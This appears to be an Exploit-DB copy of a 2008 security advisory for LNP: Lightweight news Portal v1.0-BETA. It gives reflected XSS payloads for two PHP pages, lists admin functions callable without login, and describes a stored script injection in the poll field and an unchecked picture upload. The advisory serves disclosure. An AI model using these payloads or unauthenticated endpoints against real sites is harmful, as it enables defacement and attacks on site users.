LNP: Lightweight news Portal v1.0-BETA Multiple Remote Vulnerabilities

vendor:

LNP: Lightweight news Portal

by:

sToRm

7.5

CVSS

HIGH

Cross-Site Scripting, Insecure Administration, Permanent Code Injection, File Upload

CWE

Product Name: LNP: Lightweight news Portal

Affected Version From: v1.0-BETA

Affected Version To: v1.0-BETA

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

LNP: Lightweight news Portal v1.0-BETA Multiple Remote Vulnerabilities

The LNP: Lightweight news Portal v1.0-BETA is vulnerable to multiple remote vulnerabilities including Cross-Site Scripting, Insecure Administration, Permanent Code Injection, and File Upload. These vulnerabilities can be exploited to perform various malicious activities such as executing arbitrary code, injecting malicious scripts, and uploading malicious files.

Mitigation:

The vendor should release a patch to fix these vulnerabilities. In the meantime, users are advised to upgrade to a newer version of the software if available or implement proper input validation and access control measures to mitigate the risk.

Source

Exploit-DB raw data:

  ____       _   _       _ ___   __                        _  __
 / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
 \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm


LNP: Lightweight news Portal v1.0-BETA
Multiple Remote Vulnerabilities


Cross-Site Scripting
--------------------

show_photo.php?photo="><script>javascript:alert(document.domain)</script>
show_potd.php?potd="><script>javascript:alert(document.domain)</script>


Insecure Administration
-----------------------

The admin page faces us with a login, but many important functions are allowed 
to be executed without a logged-in session.

admin.php?A=potd_delete
admin.php?A=potd
admin.php?A=vote_update
admin.php?A=vote
admin.php?A=modifynews


Permanent Code Injection
------------------------

admin.php?A=vote

"Current question" field allows for code injection, allowing us to force 
all users browsing the poll to view an XSS or browser exploit. 


File Upload
-----------

admin.php?A=potd

The "picture of the day" manager allows for further images to be 
uploaded, but does not check for image validity. Although a phpshell 
cannot be executed through this method, a source may be uploaded for 
inclusion in further attacks, possibly an LFI somewhere on the server. 

# milw0rm.com [2008-06-20]